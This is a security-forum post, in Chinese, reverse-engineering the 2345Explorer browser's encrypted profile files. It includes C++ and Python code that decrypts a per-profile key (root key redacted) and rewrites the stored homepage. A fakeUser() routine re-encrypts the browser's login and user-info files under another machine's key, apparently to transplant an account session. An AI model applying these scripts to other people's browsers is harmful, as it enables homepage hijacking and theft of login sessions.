本文为看雪论坛精华文章
看雪论坛作者ID:三猫
最近对浏览器比较感兴趣,于是对某浏览器做了一些无脑逆向,有一点点小小的收获,第一次发文,没什么技术含量的东西。
写得超级烂,大佬们喷轻点(心里承受能力弱)。
ps:大四狗刚开始实习,想学学移动安全,求大佬们给点方向吧。
该浏览器在未登录时和登录时设置主页有些区别。具体有四点内容:
chrome.1652dd4: DecrypturlKeyFromFile(byte **urlKey)
chrome.164f224: SaveHomePage(this,byte **urlKey,byte **url)
chrome.164F65A: BuildJson(byte **url,byte**json)
chrome.164F77C:Encrypt(byte **json,byte **urlKey,byte **encryptData)
chrome.164F8B6: SaveVerifyFile(byte **encryptData)
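// Reconstruction of the browser's own "set homepage while logged out" path:
// read the per-profile key file, decrypt it under the hardcoded root key,
// wrap the URL in a one-field JSON document, encrypt that under the profile
// key and write it to page_file.dat.
//
// url  - NUL-terminated homepage URL; inserted verbatim, so a '"' in it
//        would break the JSON (no escaping, as in the original).
// Returns nothing; every failure (missing key file, short read, cannot
// create the page file) is silent.
void SetHomePage(byte *url)
{
    unsigned char prefixJson[] = { "homepage" };
    // Root key redacted by the post's author; not a real value.
    unsigned char rootKey[] = { "xxxxxxxxxxxxxxxxx" };
    const char *keyPath = "C:\\Users\\xxx\\AppData\\Local\\2345Explorer\\User Data\\Default\\Syn\\HardwareInfo2.dat";
    const char *pageFile = "C:\\Users\\xxx\\AppData\\Local\\2345Explorer\\User Data\\Default\\page_file.dat";

    HANDLE hFile = CreateFileA(keyPath,
        GENERIC_READ,
        0,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL);
    if (hFile == INVALID_HANDLE_VALUE)
    {
        return;
    }

    DWORD dwSize = GetFileSize(hFile, NULL);
    if (dwSize == INVALID_FILE_SIZE || dwSize == 0)
    {
        CloseHandle(hFile);
        return;
    }

    DWORD bytesRead = 0;
    UCHAR *encryptKey = new UCHAR[dwSize];
    BOOL bRet = ReadFile(hFile, encryptKey, dwSize, &bytesRead, NULL);
    CloseHandle(hFile);
    // A short read would hand a partially filled buffer to the decryptor.
    if (bRet == FALSE || bytesRead != dwSize)
    {
        delete[] encryptKey;
        return;
    }

    // The key file is itself AES-CBC/PKCS#5 encrypted under the root key.
    byte *key = AESCBCPK5Decrypt(encryptKey, rootKey);
    // Truncate the decrypted material to a 16-byte key (matches the [:16]
    // in the Python scripts). NOTE(review): assumes the decrypt output has
    // room past index 16 — not verifiable from this listing.
    key[16] = 0;

    std::string json = std::string("{\"") + (char*)prefixJson + "\":\"" + (char*)url + "\"}";
    byte *encryptData = AESCBCPK5Encrypt(json, key);
    // Original wrote the *key* buffer with an uninitialised size; the page
    // file must hold the encrypted JSON. PKCS#5 on a 16-byte block always
    // pads up to the next multiple of 16, adding at least one byte.
    DWORD dataSize = (DWORD)((json.size() / 16 + 1) * 16);

    hFile = CreateFileA(pageFile,
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        CREATE_ALWAYS,
        FILE_ATTRIBUTE_NORMAL,
        NULL);
    if (hFile != INVALID_HANDLE_VALUE)
    {
        DWORD bytesWrite = 0;
        WriteFile(hFile, encryptData, dataSize, &bytesWrite, NULL);
        CloseHandle(hFile);
    }

    // Only the buffer this function allocated is released; ownership of
    // key/encryptData returned by the helpers is not shown here.
    delete[] encryptKey;
}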
import binascii
from Crypto.Cipher import AES
class AESCBCDeEncrypt:
    """AES-CBC helper reproducing the browser's file format.

    The same value is used as key and as IV, and decrypt() leaves the
    PKCS#5 padding in place; both are properties of the format being read
    and written, not choices of this helper (a fixed key-as-IV gives no
    per-message randomisation, so equal plaintexts encrypt identically).
    """

    def __init__(self, key):
        self.key = key
        self.mode = AES.MODE_CBC
        self.bs = 16
        # Kept as an attribute for compatibility with the original lambda.
        self.PADDING = self._pad

    def _pad(self, s):
        # PKCS#5: append n copies of chr(n), 1 <= n <= block size.
        fill = self.bs - len(s) % self.bs
        return s + chr(fill) * fill

    def _cipher(self):
        # Key doubles as IV (see class docstring).
        return AES.new(self.key, self.mode, self.key)

    def encrypt(self, text):
        """Pad and encrypt *text*; returns (hex string, raw ciphertext)."""
        padded = self.PADDING(text)
        raw = self._cipher().encrypt(padded)
        return binascii.b2a_hex(raw), raw

    def decrypt(self, text):
        """Decrypt *text*; padding is not stripped, callers slice it off."""
        return self._cipher().decrypt(text)
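def setPageWithLogin(url):
    """Rewrite the "homepage" value in the logged-in profile's UserPrefs blob.

    UserPrefs is AES-encrypted under the per-profile key, which is itself
    stored encrypted under the root key in HardwareInfo2.dat. The JSON is
    patched textually (not parsed) to keep the rest of the blob byte-for-byte
    as the browser wrote it; *url* is inserted verbatim, so a '"' in it
    would break the document.

    Raises ValueError when the expected markers are missing; the original
    code would then have sliced at -1 + len(marker) and written a truncated
    blob back.
    """
    prefsFile = r'C:\Users\xxx\AppData\Local\2345Explorer\User Data\Default\Sync\yyy\UserPrefs'
    keyFile = r'C:\Users\xxx\AppData\Local\2345Explorer\User Data\Default\Sync\HardwareInfo2.dat'

    with open(keyFile, 'rb') as f:
        macDecode = f.read()
    # 'rootKey' is the author's placeholder for the real (redacted) root key.
    key = AESCBCDeEncrypt('rootKey').decrypt(macDecode)[:16]
    dataDecoder = AESCBCDeEncrypt(key)

    with open(prefsFile, 'rb') as f:
        data = dataDecoder.decrypt(f.read())

    # Cut after the document's closing marker to drop the trailing padding.
    endMark = '"startup_urls":[]}}'
    fix = data.find(endMark)
    if fix < 0:
        raise ValueError('UserPrefs: end marker not found')
    data = data[:fix + len(endMark)]

    homeMark = '"homepage":'
    index = data.find(homeMark)
    index2 = data.find(',"pref_client"')
    if index < 0 or index2 < 0:
        raise ValueError('UserPrefs: homepage markers not found')
    index += len(homeMark)
    data = data[:index] + '"' + url + '"' + data[index2:]

    hexData, binData = dataDecoder.encrypt(data)
    with open(prefsFile, 'wb') as f:
        f.write(binData)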
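def decrypt(dataPath, keyPath):
    """Decrypt the file at *dataPath* with the profile key held in *keyPath*.

    The key file is AES-encrypted under the root key; the first 16 bytes of
    its plaintext are the data key. The returned plaintext still carries its
    PKCS#5 padding (see AESCBCDeEncrypt.decrypt).
    """
    # Redacted by the author; an empty key is not usable as-is.
    rootKey = ''
    with open(keyPath, 'rb') as f:
        keyRaw = f.read()
    key = AESCBCDeEncrypt(rootKey).decrypt(keyRaw)[:16]

    with open(dataPath, 'rb') as f:
        dataRaw = f.read()
    return AESCBCDeEncrypt(key).decrypt(dataRaw)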
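def encrypt(dataRaw, keyPath):
    """Encrypt *dataRaw* with the profile key held in *keyPath*.

    Key derivation mirrors decrypt(): the key file is decrypted under the
    root key and truncated to 16 bytes. Returns the (hex, raw) pair from
    AESCBCDeEncrypt.encrypt.
    """
    # Redacted by the author; an empty key is not usable as-is.
    rootKey = ''
    with open(keyPath, 'rb') as f:
        keyRaw = f.read()
    key = AESCBCDeEncrypt(rootKey).decrypt(keyRaw)[:16]
    return AESCBCDeEncrypt(key).encrypt(dataRaw)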
def filterinfo(info, mark):
    """Return *info* up to and including the last occurrence of *mark*.

    Used to strip the padding left on decrypted text. When *mark* is absent
    rfind() gives -1, so the result is the empty string.
    """
    cut = info.rfind(mark) + 1
    return info[:cut]
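def fakeUser():
    """Re-encrypt the decrypted Login DataV2 and UserInfo.dat under a second key file.

    Each file is decrypted with the local key file, trimmed with filterinfo()
    to drop the trailing padding, re-encrypted with otherKeyFile and written
    to the Desktop. Only the raw ciphertext from encrypt() is kept; the hex
    form is discarded. Paths are the author's placeholders.
    """
    localKeyFile = r'C:\Users\xxx\AppData\Local\2345Explorer\User Data\Default\Sync\HardwareInfo2.dat'
    otherKeyFile = r'C:\Users\xxx\Desktop\other.dat'
    loginFile = r'C:\Users\xxx\AppData\Local\2345Explorer\User Data\Default\Sync\yyy\Login DataV2'
    userinfoFile = r'C:\Users\xxx\AppData\Local\2345Explorer\User Data\Default\Sync\UserInfo.dat'

    # (source file, marker that ends the plaintext, output path), in the
    # same order the original processed them.
    jobs = [
        (loginFile, '}', r'C:\Users\xxx\Desktop\FakerLogin DataV2'),
        (userinfoFile, '\n', r'C:\Users\xxx\Desktop\FakerUserInfo.dat'),
    ]
    for srcPath, mark, outPath in jobs:
        plain = filterinfo(decrypt(srcPath, localKeyFile), mark)
        _hexData, rawData = encrypt(plain, otherKeyFile)
        with open(outPath, 'wb') as f:
            f.write(rawData)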
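def setPageWithoutLogin(url):
    """Write page_file.dat, the homepage record used when no account is logged in.

    Mirrors the browser's own SetHomePage path: the profile key is
    recovered from HardwareInfo2.dat under the root key, and a one-field
    JSON document is encrypted with it. *url* is inserted verbatim, so a
    '"' in it would break the JSON, exactly as in the browser's code.
    """
    pageFile = r'C:\Users\xxx\AppData\Local\2345Explorer\User Data\Default\page_file.dat'
    keyFile = r'C:\Users\xxx\AppData\Local\2345Explorer\User Data\Default\Sync\HardwareInfo2.dat'

    with open(keyFile, 'rb') as f:
        macDecode = f.read()
    # 'rootKey' is the author's placeholder for the real (redacted) root key.
    key = AESCBCDeEncrypt('rootKey').decrypt(macDecode)[:16]
    dataEncoder = AESCBCDeEncrypt(key)

    # Same bytes the original produced via str.replace on a template.
    payload = '{"homepage":"%s"}' % url
    _hexData, binData = dataEncoder.encrypt(payload)
    with open(pageFile, 'wb') as f:
        f.write(binData)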
if __name__ == '__main__':
    # Demo driver: re-key the sync files, then set the same homepage in both
    # the logged-out (page_file.dat) and logged-in (UserPrefs) locations.
    homepage = "iloveChina"
    fakeUser()
    setPageWithoutLogin(homepage)
    setPageWithLogin(homepage)
看雪ID:三猫
https://bbs.pediy.com/user-784599.htm